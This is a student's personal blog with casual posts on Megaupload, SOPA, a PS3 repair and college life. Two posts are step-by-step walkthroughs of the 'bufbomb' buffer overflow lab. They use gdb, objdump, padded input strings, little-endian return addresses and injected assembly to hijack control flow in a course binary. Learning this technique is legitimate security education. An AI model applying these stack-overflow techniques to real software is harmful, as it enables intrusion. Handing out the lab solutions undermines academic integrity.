avatar

So long, megaupload…

Megaupload has been shutdown due to four of its members being arrested by the U.S. It’s a pretty interesting move on the part of the federal government to make these arrests the day after the anti-SOPA blackout, but so far it has caused Anonymous to go crazy and DDoS sites like the MPAA’s and whitehouse.gov.

I for one, will miss Megaupload. Finding out that the CEO was a cool hacker dude who threw million dollar parties in France has increased the amount of respect I have for the website.

In the end, I hope the government doesn’t win the copyright infringement debate/fight/war.

Posted in Internet | Tagged , , , , | Leave a comment
avatar

SOPA

I know you have all been downloading my Dick Cheney Cage Match. It’s not copyrighted or anything to do with SOPA, but I’m sure something weird would happen to more prominent blogs. It’s really bad. Do something about it.

Posted in Uncategorized | Leave a comment
avatar

Updates

I updated my About I page slightly with the specs of my current computer. The machine that was previously there is being lent to one of my current roommates for SWTOR.

I don’t really feel very motivated anymore. This can be seen in the state of this blog and the frequency of my posting. I spend most of my time sleeping and staring at things.

Posted in Me, Purpose | Tagged , , , , | Leave a comment
avatar

PS3 Slim YLOD

I have a PS3 slim now, but it has YLOD (Yellow Light of Death) and I doubt I will be able to fix it. The ram looks a little cooked (Perhaps the previous owner used a heat gun on it or it melted on its own). Anybody have any ideas on how to get it working? I have reflowed it before (with no success) and this is killing my 100% YLOD recovery rate on PlayStations. I may take another crack at it tonight, as I would much rather play my free copy of Infamous (I got it from the PlayStation store when they got hacked last spring) on a slim PS3 with back-lit buttons on the console instead of on my Phat PS3 that is upstairs being used to play digital content from my UPNP server.

Posted in Games | Tagged , , | Leave a comment
avatar

Word.

NBA is horrible for vetoing Chris Paul trade.

Finals are next week. Can’t wait ’til winter break.

Word.

Posted in college, Srsly | Leave a comment
avatar

Done blogging about homework

I am not going to blog about homework anymore this year. It is now finals week and I am about to take my second final exam of the year. It will be interesting to see how viewership spikes around the end of each quarter as different schools have to solve the buffer overflow lab, but I don’t really want to write about it anymore. For those of you searching for the answer for bufbomb phase 3 there is a hint in a comment on phase 2 which pretty much tells you the secret, but I am not going to post a guide on how to solve it.

Now that school is almost done and winter break is approaching I am going to focus on learning javascript and jquery stuff.

Posted in Uncategorized | 1 Comment
avatar

Bufbomb Phase 2

I finished the buffer overflow lab this evening and finally got around to writing up how to solve it.

Phase 3 is probably the most challenging phase and requires some knowledge to solve. Here are instructions to get you started courtesy of Waseem, a commenter on the previous post:

…in phase 2, before that you need to put your Cookie’s information in Global_value memory’s location.. so the steps are:

set the global_value with the cookie and returning to .

first write the assembly code for the 2 things mentioned above.

movl $0x349aab36, 0x804a02c <-This is the place where the global_value is stored, So you need to find the memory address of your Global_Value using printf "%x", &Global_value gdb command.

pushl $0x80489ec <-This is the return address for , this would be the starting address of your bang function
ret /// return

Then, using gcc -c and objdump -d can we get the exploit code.

After calculating how many bytes they need, we can get the return address for the exploit code

I hope this will help you in solving your phase -2

These instructions were extremely helpful. Here are a few tips for how to solve this step.

I used the “info vars” command while in gdb to get the address of the global_value. For the return address you need to find the address of the first byte of the input string. This can be found by dumping 20 words off of %esp and then narrowing down the location in memory. I used x/20wx $ebp in gdb in the getbuf function and spotted the memory address I was looking for.

Posted in college, Computers | Tagged , | 24 Comments
avatar

Bufbomb phase 0 and 1

EDIT: This post has become extremely popular and I would like to take a minute to discuss why this is here. This post was put here by me to help students solve and understand the extremely difficult bufbomb lab. It is not here to give students the answers, it is here to explain how to solve the answers and why these solutions work using assembly and GDB for students who might be struggling.

I have been working on the Bufbomb phase 0 and 1 recently and decided to share a basic idea of how to do them for anybody who is searching the internet for the answers.

Phase 0

This phase is really easy and you should probably be able to get it on your own, but it took me a while to get. Start by starting gdb and setting a break point for getbuf. Now run it until it hits the breakpoint. At this point you need to get the address of %ebp and %esp. Just type ‘info registers’ to get this. Subtract %esp from %ebp using this hex calculator. This gives us the distance to the end of the getbuf function in the stack. You should know that the last 4 segments of your input should be the address of the smoke function. Quit gdb by typing q and type objdump -d bufbomb. Find the smoke function in the output and write down the address. Now make your input file using nano, emacs or vi and name it something like candle.txt. You need to do a bit of calculation here. Subtract 4 from the distance you calculated between %esp and %ebp. Now type in numbers until you reach the new distance. For example if my distance between %esp and %ebp was 28 I would type:

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

Now you need to reverse the address of the smoke function because the machine is little endian. For example, if the address of my smoke function was 12345678, I would put 78 56 34 12 into my input file. The input file would look like this:

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 78 56 34 12

Save your input file and use sendstring to encode it to binary with this command:

./sendstring < candle.txt > candle.bin

Now run the bufbomb:

./bufbomb -t *team name* < candle.bin

Phase 1

This phase is slightly harder and requires slightly more skill to solve. The goal is to call the fizz function and pass it your cookie as an argument. The first part is pretty much the same as Phase 0. Use ‘objdump -d bufbomb’ to find the address of the fizz function. Put the address of fizz in the place of the address of the smoke function in the same way as the first phase. If your address was 01122334 for fizz it would be 34 23 12 01.

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 34 23 12 01

Now add 4 numbers for padding (I used the number 30) and add your cookie reversed for a little endian machine. If my cookie was 56789123 it would be 23 91 78 56. using that logic add the cookie to the end of your string.

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 34 23 12 01 30 30 30 30 23 91 78 56

From there save and use sendstring to encode to a binary file again and run it like you did in the first step. I am pretty sure that this is how I completed the first two phases, but if anybody reading this needs more help hit up the comments and I will try to assist.

Posted in college | Tagged , , , , , | 22 Comments
avatar

STRAIGHT OUTTA COMPTON

HOLY CRAP the new hockey arena, Compton Ice, is AMAZING. I am going to every game ever.

Posted in Uncategorized | 5 Comments
avatar

Seinfeld

I watched some Seinfeld tonight. It’s been a while. It’s an awesome show though. I just had to break down my tolerance of it again.

Fall break has commenced. I was hoping to be around this Friday to bro tier with Warren but it turns out I will have to do the opposite. The opposite of that is probably going back to school with my grandparents to show them the college campus early, and then going to the first hockey game in the new arena after they leave. But that’s getting into some pretty heavy opposite theory.

Should I stay up more and keep watching Seinfeld? Yes.

Posted in college, QGAGE, Srsly, Uncategorized | Tagged , , , | 1 Comment